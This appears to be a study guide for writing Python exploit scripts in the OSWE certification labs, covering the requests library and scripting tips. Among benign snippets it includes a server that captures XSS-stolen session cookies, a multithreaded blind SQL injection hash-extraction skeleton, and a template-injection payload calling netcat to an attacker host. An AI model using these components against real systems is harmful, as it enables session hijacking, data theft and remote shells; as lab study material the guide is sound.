This repository contains a list of useful snippets and tips that pertain to the writing of exploit scripts in the OSWE labs and certification exam.
Some examples here may go against certain coding practices, but our end goal is to write the exploit script quickly and correctly.
The Code Snippets section is a great place to start if you are not experienced in using the requests library or are new to Python. Otherwise, feel free to skip to the Reusable Code section or the Tips section.
- While there are many write-ups, reviews, and notes on the certification, few resources specifically focus on the process of writing exploits.
- Writing the exploit script can be daunting, especially for those who are new to Python or have little experience interacting with web applications through code.
- Time spent on identifying vulnerabilities and documenting an exam report can fluctuate considerably, but the time spent on developing the exploit script can be minimized and kept constant if mastered well.
- Exploit Writing for OSWE
  - Background
  - Table of Contents
  - Code Snippets
    - Starting Template
    - Useful imports
    - Using the requests library
      - Sending the simplest HTTP request
      - Specifying different HTTP methods
      - Reading the HTTP response
      - Sending data as a query string in the URL (Using params argument)
      - Sending data as a query string in the body (Using data argument)
      - Sending data as a JSON in the body (Using json argument)
      - Sending a file in the body (Using files argument)
      - Setting HTTP headers (Using headers argument)
      - Setting HTTP cookies (Using cookies argument)
      - Disabling following of 3XX redirects (Using allow_redirects argument)
      - Interacting with an unverified HTTPS server (Using verify argument)
      - Sending request through a HTTP proxy (Using proxies argument)
      - Creating a Session
        - Setting persistent cookies
        - Setting persistent headers
      - Troubleshooting
  - Reusable code
  - Tips
    - Perform a sanity check after every HTTP request using assert
    - Print meaningful messages after each step
    - Separate each exploitation step into its own function
    - Create a global Session object so it does not need to be explicitly passed to each function call
    - Create a global BASE_URL string and construct the required URLs from it
    - To force all HTTP requests to go through Burp Suite without the use of the proxies argument, set the HTTP_PROXY / HTTPS_PROXY environment variable when running
    - Apply encoding/decoding scheme(s) to enable safe transmission of payloads
    - Use """ to create the payload string if it contains both single (') and double quotes (")
    - Speed up SQL injections using multithreading
    - Hardcode an authenticated user's cookie when developing exploits for authenticated features
    - Avoid using f-strings (f"") or str.format if the payload contains too many curly braces ({})
import requests
def main():
    print("Hello World!")

if __name__ == "__main__":
    main()
# For sending HTTP requests
import requests
# For Base64 encoding/decoding
from base64 import b64encode, b64decode, urlsafe_b64encode, urlsafe_b64decode
# For getting current time or for calculating time delays
from time import time
# For regular expressions
import re
# For running shell commands
import subprocess
# For multithreading
from concurrent.futures import ThreadPoolExecutor
# For running a HTTP server in the background
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
# For parsing HTTP cookies
from http import cookies
# For getting command-line arguments
import sys
resp_obj = requests.get("https://github.com")
# GET method
requests.get("https://github.com")
# POST method
requests.post("https://github.com")
# PUT method
requests.put("https://github.com")
# PATCH method
requests.patch("https://github.com")
# DELETE method
requests.delete("https://github.com")
resp_obj = requests.get("https://github.com")
# HTTP status code (e.g 404, 500, 301)
resp_obj.status_code
# HTTP response headers (e.g Location, Content-Disposition)
resp_obj.headers["Location"]
# Body as bytes
resp_obj.content
# Body as a string
resp_obj.text
# Body as a dictionary (if body is a JSON)
resp_obj.json()
params = {
"foo": "bar"
}
requests.get("https://github.com", params=params)
data = {
"foo": "bar"
}
requests.post("https://github.com", data=data)
data = {
"foo": "bar"
}
requests.post("https://github.com", json=data)
files = {
# (FILE_NAME, FILE_CONTENTS, FILE_MIMETYPE)
"uploaded_file": ("phpinfo.php", b"<?php phpinfo() ?>", "application/x-httpd-php")
}
requests.post("https://github.com", files=files)
headers = {
"X-Forwarded-For": "127.0.0.1"
}
requests.get("https://github.com", headers=headers)
cookies = {
"PHPSESSID": "fakesession"
}
requests.get("https://github.com", cookies=cookies)
requests.post("https://github.com/login", allow_redirects=False)
# Suppresses InsecureRequestWarning messages
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
requests.get("https://github.com", verify=False)
# Keys are the lowercase URL schemes of the requests being proxied
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080"
}
requests.get("https://github.com", proxies=proxies)
session = requests.Session()
session.get("https://github.com")
session = requests.Session()
session.cookies.update({"PHPSESSID": "fakesession"})
session = requests.Session()
session.headers["Authorization"] = "Basic 123"
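To see what a Session will attach to later requests, the merged result can be inspected without sending anything. The following is a minimal sketch, assuming a hypothetical target URL (http://example.com/admin) that is never contacted; `prepare_request()` builds the outgoing request in memory with the session's persistent headers and cookies applied.

```python
import requests

session = requests.Session()
session.headers["Authorization"] = "Basic 123"
session.cookies.update({"PHPSESSID": "fakesession"})

# Hypothetical URL; prepare_request() does not touch the network
prepared = session.prepare_request(
    requests.Request("GET", "http://example.com/admin")
)

# Both values were set once on the session and are merged into the request
print(prepared.headers["Authorization"])
print(prepared.headers["Cookie"])
```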
- Open Wireshark
- Select the VPN interface (e.g. tun0)
- Enter http into the filter bar.
data = {
"foo": "bar"
}
resp_obj = requests.post("https://github.com", data=data)
prepared_request = resp_obj.request
print("Method:\n", prepared_request.method)
print()
print("URL:\n", prepared_request.url)
print()
print("Headers:\n", prepared_request.headers)
print()
print("Body:\n", prepared_request.body)
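A request can also be inspected before it is ever sent, which helps when comparing how the params, data and json arguments encode the same dictionary. This is a minimal sketch, assuming a hypothetical URL (http://example.com/login); `requests.Request(...).prepare()` returns the same kind of prepared request object that `resp_obj.request` exposes above.

```python
import json
import requests

URL = "http://example.com/login"  # hypothetical target, never contacted
FIELDS = {"foo": "bar"}

# prepare() builds each request in memory; nothing is sent
as_params = requests.Request("GET", URL, params=FIELDS).prepare()
as_form = requests.Request("POST", URL, data=FIELDS).prepare()
as_json = requests.Request("POST", URL, json=FIELDS).prepare()

# params ends up in the URL, data and json end up in the body
print("params ->", as_params.url)
print("data   ->", as_form.headers["Content-Type"], as_form.body)
print("json   ->", as_json.headers["Content-Type"], as_json.body)
```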
- Open Burp Suite
- Navigate to "Proxy" Tab and set "Intercept" to "On".
LHOST = "10.0.0.1"
WEB_PORT = 8000
JS_PAYLOAD = "<script>alert(1)</script>"
def start_web_server():
    class MyHandler(BaseHTTPRequestHandler):
        # Uncomment this method to suppress HTTP logs
        # def log_message(self, format, *args):
        #     return
        def do_GET(self):
            if self.path.endswith('/payload.js'):
                self.send_response(200)
                self.send_header("Content-Type", "application/javascript")
                self.send_header("Content-Length", str(len(JS_PAYLOAD)))
                self.end_headers()
                self.wfile.write(JS_PAYLOAD.encode())

    httpd = HTTPServer((LHOST, WEB_PORT), MyHandler)
    threading.Thread(target=httpd.serve_forever).start()
start_web_server()
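The server above runs in a regular thread, so the script keeps running until it is interrupted. One possible variation, sketched here under the assumption that the server is only needed for a short time, is to start it in a daemon thread and shut it down explicitly. The loopback address, the port 0 (any free port) and the local test request are stand-ins for LHOST, WEB_PORT and the victim's browser.

```python
import threading
from http.client import HTTPConnection
from http.server import HTTPServer, BaseHTTPRequestHandler

JS_PAYLOAD = b"alert(1)"


class PayloadHandler(BaseHTTPRequestHandler):
    def log_message(self, format, *args):
        return  # keep the exploit output free of HTTP logs

    def do_GET(self):
        if self.path.endswith("/payload.js"):
            self.send_response(200)
            self.send_header("Content-Type", "application/javascript")
            self.send_header("Content-Length", str(len(JS_PAYLOAD)))
            self.end_headers()
            self.wfile.write(JS_PAYLOAD)
        else:
            self.send_error(404)


# Port 0 asks the OS for a free port; a real exploit would bind (LHOST, WEB_PORT)
httpd = HTTPServer(("127.0.0.1", 0), PayloadHandler)
# daemon=True lets the script exit even if the server is still running
threading.Thread(target=httpd.serve_forever, daemon=True).start()

# Stand-in for the victim fetching the payload
conn = HTTPConnection("127.0.0.1", httpd.server_address[1], timeout=5)
conn.request("GET", "/payload.js")
served = conn.getresponse().read()
conn.close()
print(served)

httpd.shutdown()      # stop serve_forever()
httpd.server_close()  # release the listening socket
```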
LHOST = "10.0.0.1"
WEB_PORT = 8000
session = requests.Session()
xss_event = threading.Event()  # Signifies when victim sends their cookie

def send_xss_payload():
    pass

def start_web_server():
    class MyHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(200)
            self.end_headers()
            # Load stolen cookie into session
            _, enc_cookie = self.path.split("/?cookie=", 1)
            plain_cookie = urlsafe_b64decode(enc_cookie).decode()
            session.cookies["PHPSESSID"] = cookies.SimpleCookie(plain_cookie)["PHPSESSID"]
            xss_event.set()  # Trigger the event

    httpd = HTTPServer((LHOST, WEB_PORT), MyHandler)
    threading.Thread(target=httpd.serve_forever).start()
start_web_server()
send_xss_payload()
xss_event.wait() # Wait for event to be triggered
print("[+] Stolen cookie:", session.cookies["PHPSESSID"])
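The decoding done inside the handler can be tried offline before wiring it into the server. The sketch below assumes the XSS payload sends `document.cookie` Base64-encoded in a `cookie` query parameter, which matches the path format the handler above splits on; the cookie values are made up.

```python
from base64 import urlsafe_b64encode, urlsafe_b64decode
from http import cookies

# Made-up cookie string standing in for the victim's document.cookie
stolen = "PHPSESSID=abc123; theme=dark"

# The request path the web server would receive (assumed payload shape)
path = "/?cookie=" + urlsafe_b64encode(stolen.encode()).decode()

# Same steps as in the handler: split, decode, parse
_, enc_cookie = path.split("/?cookie=", 1)
plain_cookie = urlsafe_b64decode(enc_cookie).decode()
session_id = cookies.SimpleCookie(plain_cookie)["PHPSESSID"].value

print("[+] Parsed PHPSESSID:", session_id)
```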
MAX_WORKERS = 20
HASH_LENGTH = 32
def exfiltrate_hash():
    def boolean_sqli(arguments):
        idx, ascii_val = arguments
        # ...
        # Perform SQLi and store boolean outcome into truth
        # ...
        return ascii_val, truth

    result = ""
    # Go through each character position
    for idx in range(HASH_LENGTH):
        # Use MAX_WORKERS threads to test possible ASCII values in parallel
        with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
            # Pass each of (idx, 32), (idx, 33), ..., (idx, 126) as an argument to boolean_sqli()
            responses = executor.map(boolean_sqli, [(idx, ascii_val) for ascii_val in range(32, 127)])
        # Go through each response and determine which ASCII value is correct
        for ascii_val, truth in responses:
            if truth:
                result += chr(ascii_val)
                break
    return result
hash = exfiltrate_hash()
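The skeleton above leaves the injection itself elided. To check the threading logic before pointing it at a target, the oracle can be replaced with a local stand-in. In this sketch, `SECRET` and the comparison inside `boolean_sqli()` are placeholders for the value held by the database and for the HTTP request a real exploit would send; a single executor is also reused across all character positions, which is a design choice rather than a requirement.

```python
from concurrent.futures import ThreadPoolExecutor

MAX_WORKERS = 20
SECRET = "5f4dcc3b5aa765d61d8327deb882cf99"  # placeholder for the target's hash
HASH_LENGTH = len(SECRET)


def boolean_sqli(arguments):
    idx, ascii_val = arguments
    # Placeholder oracle: a real exploit would send the injection here
    # and derive truth from the HTTP response
    truth = ord(SECRET[idx]) == ascii_val
    return ascii_val, truth


def exfiltrate_hash():
    result = ""
    with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
        # Go through each character position
        for idx in range(HASH_LENGTH):
            candidates = [(idx, ascii_val) for ascii_val in range(32, 127)]
            # map() yields results in the order of the candidates
            for ascii_val, truth in executor.map(boolean_sqli, candidates):
                if truth:
                    result += chr(ascii_val)
                    break
    return result


print("[+] Recovered:", exfiltrate_hash())
```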
- Catch whether a webshell is indeed uploaded before attempting to trigger it
- Catch whether authentication is successful before exploiting authenticated features
Example:
# Suppose 302 is returned if successful login
resp_obj = requests.post("http://example.com/login", data=data, allow_redirects=False)
assert resp_obj.status_code == 302, "Login not successful"
# Suppose admin page is returned if successful login
resp_obj = requests.post("http://example.com/login", data=data)
# Use .text (str) here; .content is bytes and cannot be searched with a str
assert "Admin Dashboard" in resp_obj.text, "Login not successful"
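One caveat with assert is that Python skips assert statements when run with the -O flag. If that is a concern, a small helper can perform the same checks unconditionally. The `check()` function below is a hypothetical helper, not part of any library, and the status code and body are simulated values standing in for `resp_obj.status_code` and `resp_obj.text`.

```python
import sys


def check(condition, message):
    """Stop the exploit with a clear message when a step did not work."""
    if not condition:
        sys.exit(f"[-] {message}")


# Simulated values; in a real script these come from resp_obj
status_code = 302
body = "<h1>Admin Dashboard</h1>"

check(status_code == 302, "Login not successful")
check("Admin Dashboard" in body, "Login not successful")
print("[+] Sanity checks passed")
```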
- Action being started/finished OR
- Cookies/tokens/files/values that were retrieved
Example:
[+] Parsed command-line arguments and got:
* BASE_URL: http://example.com
* LHOST: 127.0.0.1
* LPORT: 1337
[+] Triggered password reset token generation
[=] Getting password reset token length...
[+] Got password reset token length: 10
[=] Retrieving password reset token...
[+] Got password reset token: FAKE_TOKEN
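Output in this style is easier to keep consistent with a pair of tiny helpers. This is a minimal sketch; the function names `fmt()`, `info()` and `success()` are made up for illustration, and the markers follow the example output above.

```python
def fmt(marker, message):
    """Prefix a message with a status marker such as [+] or [=]."""
    return f"[{marker}] {message}"


def info(message):
    # An action is in progress
    print(fmt("=", message))


def success(message):
    # An action finished or a value was retrieved
    print(fmt("+", message))


info("Getting password reset token length...")
success("Got password reset token length: 10")
```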
Example:
def register():
    pass

def login():
    pass

def rce():
    pass
session = requests.Session()
def login():
    session.post(...)

def rce():
    session.post(...)
BASE_URL = ""
session = requests.Session()
def login():
    url = BASE_URL + "/login"
    session.post(url, ...)

def rce():
    url = BASE_URL + "/rce"
    session.post(url, ...)

def main():
    # Allow BASE_URL to be modified
    global BASE_URL
    BASE_URL = sys.argv[1]
    ...
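Plain concatenation produces a double slash when the base URL is passed with a trailing slash (for example `http://example.com/`). A small helper can normalise this. The sketch below uses a hypothetical `build_url()` function that takes the base URL as an argument so it can be tried on its own; in the exploit script it could read the global BASE_URL instead.

```python
def build_url(base_url, path):
    """Join a base URL and a path with exactly one slash between them."""
    return base_url.rstrip("/") + "/" + path.lstrip("/")


# Both spellings of the base URL give the same result
print(build_url("http://example.com", "/login"))
print(build_url("http://example.com/", "login"))
```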
To force all HTTP requests to go through Burp Suite without the use of the proxies argument, set the HTTP_PROXY / HTTPS_PROXY environment variables when running the script:
$ HTTP_PROXY=http://127.0.0.1:8080 python3 poc.py
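The same effect can be had from inside the script by setting the variables before any request is made, which may be handy while debugging. This is a sketch that assumes Burp Suite is listening on 127.0.0.1:8080; note that requests to https:// URLs are only proxied when HTTPS_PROXY is set as well. The standard-library call at the end just shows which proxy settings are visible through the environment.

```python
import os
from urllib.request import getproxies_environment

BURP = "http://127.0.0.1:8080"  # assumed Burp Suite proxy listener

# Equivalent to prefixing the command with HTTP_PROXY=... HTTPS_PROXY=...
os.environ["HTTP_PROXY"] = BURP
os.environ["HTTPS_PROXY"] = BURP

# Proxy settings as read from the environment variables
print(getproxies_environment())
```

Remember to remove these lines (or the environment variables) once the exploit no longer needs to be observed in Burp Suite.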
- Base64
- Hexadecimal
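Both schemes turn a payload with quotes, spaces and other awkward characters into a plain alphanumeric string that survives transport, provided the receiving side decodes it again. A minimal sketch with a made-up payload:

```python
from base64 import b64encode, b64decode

# Made-up payload containing quotes and shell metacharacters
payload = "bash -c 'id > /tmp/out' && echo \"done\""

# Base64: encode to bytes first, then back to str for embedding
b64_payload = b64encode(payload.encode()).decode()

# Hexadecimal: two hex digits per byte
hex_payload = payload.encode().hex()

print(b64_payload)
print(hex_payload)

# Decoding restores the original payload in both cases
assert b64decode(b64_payload).decode() == payload
assert bytes.fromhex(hex_payload).decode() == payload
```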
Example:
payload = """This is a '. This is a "."""
Hardcoding the cookie is especially useful when many time-consuming steps are needed to obtain an authenticated session.
Example:
session = requests.Session()
def main():
    # Skipping these for now...
    # register()
    # login()

    # TODO: Delete this line after you are
    # done developing and uncomment the above steps!
    session.cookies["JSESSIONID"] = "ADMIN_COOKIE"

    # Exploit authenticated features...
    ...
Doubling each curly brace just to escape them can be troublesome and error-prone. Instead, use simple placeholders and do a .replace()!
Example:
# Too many curly braces
ssti_payload = f"{{{{ __import__('os').system('nc {LHOST} {LPORT}') }}}}"
# Much easier to read
ssti_payload = "{{ __import__('os').system('nc <LHOST> <LPORT>') }}"\
    .replace("<LHOST>", LHOST)\
    .replace("<LPORT>", str(LPORT))  # str() in case LPORT is an int
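As an alternative to chained `.replace()` calls, the standard library's `string.Template` uses `$name` placeholders and leaves curly braces alone. This is a sketch with assumed values for LHOST and LPORT; a payload that contains a literal dollar sign would need it written as `$$`.

```python
from string import Template

LHOST = "10.0.0.1"  # assumed attacker address
LPORT = 1337        # assumed listener port

# Curly braces need no escaping; only $NAME is substituted
template = Template("{{ __import__('os').system('nc $LHOST $LPORT') }}")
ssti_payload = template.substitute(LHOST=LHOST, LPORT=LPORT)

print(ssti_payload)
```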